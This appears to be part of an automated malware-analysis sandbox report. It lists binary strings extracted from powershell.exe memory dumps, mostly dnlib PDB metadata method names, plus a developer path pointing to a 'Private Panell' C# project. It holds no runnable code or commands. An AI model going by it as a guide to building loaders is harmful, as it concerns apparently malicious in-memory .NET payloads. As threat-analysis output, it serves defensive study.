Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
